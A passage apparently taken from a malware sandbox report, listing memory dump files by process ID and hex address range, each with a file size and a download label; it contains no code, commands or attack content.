        Filesize

        7.7MB

        Download

      • memory/3196-38-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3196-24-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3500-90-0x0000000007AA0000-0x0000000007BD2000-memory.dmp

        Filesize

        1.2MB

        Download

      • memory/3500-94-0x000000000A670000-0x000000000A67A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3500-113-0x000000000F290000-0x000000000F2A2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/3500-108-0x000000000EBF0000-0x000000000F208000-memory.dmp

        Filesize

        6.1MB

        Download

      • memory/3500-114-0x000000000F2F0000-0x000000000F32C000-memory.dmp

        Filesize

        240KB

        Download

      • memory/3500-107-0x000000000E400000-0x000000000E5C2000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/3500-105-0x000000000A9A0000-0x000000000A9F0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/3500-89-0x0000000002EA0000-0x0000000002EAC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/3500-106-0x000000000AAB0000-0x000000000AB62000-memory.dmp

        Filesize

        712KB

        Download

      • memory/3500-91-0x0000000007BD0000-0x0000000007EF4000-memory.dmp

        Filesize

        3.1MB

        Download

      • memory/3500-92-0x000000000DC80000-0x000000000E224000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3500-93-0x000000000A6E0000-0x000000000A772000-memory.dmp

        Filesize

        584KB

        Download

      • memory/3612-169-0x0000000070810000-0x000000007085C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4460-140-0x0000000006FD0000-0x0000000006FDA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4460-127-0x0000000006210000-0x0000000006242000-memory.dmp

        Filesize

        200KB

        Download

      • memory/4460-128-0x0000000070810000-0x000000007085C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4460-138-0x00000000061F0000-0x000000000620E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4460-139-0x0000000006E00000-0x0000000006EA3000-memory.dmp

        Filesize

        652KB

        Download

      • memory/4460-141-0x00000000071E0000-0x0000000007276000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4460-142-0x0000000007150000-0x0000000007161000-memory.dmp

        Filesize

        68KB

        Download

      • memory/4608-20-0x0000000006360000-0x00000000063A4000-memory.dmp

        Filesize

        272KB

        Download

      • memory/4608-18-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4608-21-0x00000000070D0000-0x0000000007146000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4608-0-0x0000000074A7E000-0x0000000074A7F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4608-23-0x0000000007170000-0x000000000718A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4608-22-0x00000000077D0000-0x0000000007E4A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/4608-39-0x00000000023B0000-0x00000000023BC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/4608-40-0x0000000007300000-0x0000000007366000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4608-41-0x0000000074A7E000-0x0000000074A7F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4608-19-0x0000000005E20000-0x0000000005E6C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4608-42-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4608-47-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4608-8-0x00000000056C0000-0x0000000005A14000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4608-7-0x0000000004E10000-0x0000000004E76000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4608-6-0x0000000004DA0000-0x0000000004E06000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4608-222-0x0000000007670000-0x00000000076CC000-memory.dmp

        Filesize

        368KB

        Download

      • memory/4608-223-0x0000000008F50000-0x000000000900C000-memory.dmp

        Filesize

        752KB

        Download

      • memory/4608-5-0x0000000004D00000-0x0000000004D22000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4608-4-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4608-3-0x0000000004F90000-0x00000000055B8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/4608-2-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4608-1-0x00000000024B0000-0x00000000024E6000-memory.dmp

        Filesize

        216KB

        Download